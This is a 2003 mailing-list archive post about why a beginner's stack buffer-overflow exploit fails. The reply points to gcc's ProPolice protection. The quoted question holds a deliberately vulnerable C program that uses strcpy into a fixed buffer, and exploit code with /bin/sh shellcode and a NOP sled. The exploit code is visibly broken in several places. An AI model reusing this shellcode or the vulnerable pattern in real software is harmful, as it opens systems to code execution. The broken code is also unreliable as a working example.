Vulnerability Development mailing list archives

Re: Why doesnt work?

From: "Daniel Bartlett" <dan () lockedbox net>
Date: Thu, 9 Oct 2003 03:13:00 +0100 (BST)


I wonder which version of gcc your using if gcc at all. I wonder this
because in new releases of gcc contain some patches to help protect from
buffer overflows, propolice. I found when expirementing with bufferflows
of a similar simpile c proggie needed the amount of data over the buffer
size to be approx 20-30 chars more than the size of the buffer.
Have you tried with a huge amount of data, like say double?
Cheers,
Daniel.

On 10/8/2003, "BORJA RUIZ CASTRO MORON" <padre () fedro ugr es> wrote:

Hi! Im trying 2 xploit a little code:
-----------------------------------------------------------

// foo.c, vuln proggy
// compile gcc -o foo foo.c
//

#include <stdio.h>
#include <string.h>

main (int argc,char **argv){

char buffer[1024];

if (!argc) {
   fprintf(stdout,"No argument found.");
   exit(-1);
   }

strcpy(buffer,argv[1]);

}

-------------------------------------------------------------------------

We see,if argv[1]>1024, It will generate a segmentation fault,it isnt?

So,here the exploit code:

// Exploit code 4 foo.c
//

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

#define NOP 0x90

main (void) {

char buffer[1032]; /* 1024 + 8 */
int offset,i,ret;
char *ptr,*ptr2;


char shellcode[]=
"\x31\xc0"                      // xorl         %eax,%eax
"\x50"                          // pushl        %eax
"\x68\x6e\x2f\x73\x68"          // pushl        $0x68732f6e
"\x68\x2f\x2f\x62\x69"          // pushl        $0x69622f2f
"\x89\xe3"                      // movl         %esp,%ebx
"\x99"                          // cltd
"\x52"                          // pushl        %edx
"\x53"                          // pushl        %ebx
"\x89\xe1"                      // movl         %esp,%ecx
"\xb0\x0b"                      // movb         $0xb,%al
"\xcd\x80"                      // int          $0x80
;

long get_sp(){
__asm__ ("movl %esp,%eax");
    }

help () {
fprintf ("Usage: %s <offset>\n",argv[0]);
exit(0);
}

if (!argc)
    help();

offset=atoi(argv[1]);

for (i=0;i<strlen(buffer);i++) {
  buffer[i]=0x00;
    }

ptr=buffer;

for (i=0;i<(strlen(buffer)-strlen(shellcode));i++) {
                      *(ptr++)=NOP;
                                  }
  for(i=0;i<strlen(shellcode);i++)
      *(ptr++)=shellcode[i];
             }
  ptr2=(long *)ptr;

  for(i=0;i<8;i++) {
      *(ptr2++)=get_sp()+offset;
                }
execl("./foo", "foo",buffer,0);
}

//EOF

--------------------------------------------------------
This exploit doesnt work,can you help me? why it doesnt work? ARggg!!!

Sorry 4 my poor english.
Greetings from spain!

Current thread:

Why doesnt work? BORJA RUIZ CASTRO MORON (Oct 08)
- Re: Why doesnt work? Daniel Bartlett (Oct 09)
- <Possible follow-ups>
- Re: Why doesnt work? Vade 79 (Oct 10)